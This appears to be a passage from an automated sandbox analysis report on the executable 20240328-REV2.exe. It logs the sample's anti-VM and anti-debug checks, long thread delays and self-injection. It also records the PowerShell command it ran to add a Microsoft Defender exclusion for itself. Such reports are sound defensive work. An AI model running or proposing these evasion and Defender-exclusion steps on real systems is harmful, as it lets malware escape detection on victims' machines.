                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: 20240328-REV2.exe PID: 6840, type: MEMORYSTR
Source: C:\Users\user\Desktop\20240328-REV2.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: CE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 2610000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 89D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 99D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 9BE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: ABE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: B150000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: C150000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: E90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 2940000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: 27E0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2275
Source: C:\Users\user\Desktop\20240328-REV2.exe | Window / User API: threadDelayed 2036
Source: C:\Users\user\Desktop\20240328-REV2.exe | Window / User API: threadDelayed 2726
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6816 | Thread sleep count: 2036 > 30
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99890s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99770s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99515s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6816 | Thread sleep count: 2726 > 30
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99358s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99249s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99140s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -99029s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98904s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98781s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98453s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98343s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98234s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -97977s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\20240328-REV2.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\20240328-REV2.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\20240328-REV2.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99890
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99770
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99640
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99515
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99358
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99249
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99140
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 99029
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98904
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98781
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98672
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98562
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98453
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98343
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98234
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 98125
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 97977
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 97859
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 97750
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 97640
Source: C:\Users\user\Desktop\20240328-REV2.exe | Thread delayed: delay time: 922337203685477
Source: Amcache.hve.8.dr | Binary or memory string: VMware
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.8.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: 20240328-REV2.exe, 00000005.00000002.2743758681.000000000099A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringPNPDeviceID
Source: Amcache.hve.8.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: 20240328-REV2.exe, 00000005.00000002.2751147441.0000000005D20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWJ
Source: Amcache.hve.8.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\20240328-REV2.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\20240328-REV2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
Source: C:\Users\user\Desktop\20240328-REV2.exe | Memory written: C:\Users\user\Desktop\20240328-REV2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\20240328-REV2.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
Source: C:\Users\user\Desktop\20240328-REV2.exe | Process created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Users\user\Desktop\20240328-REV2.exe VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
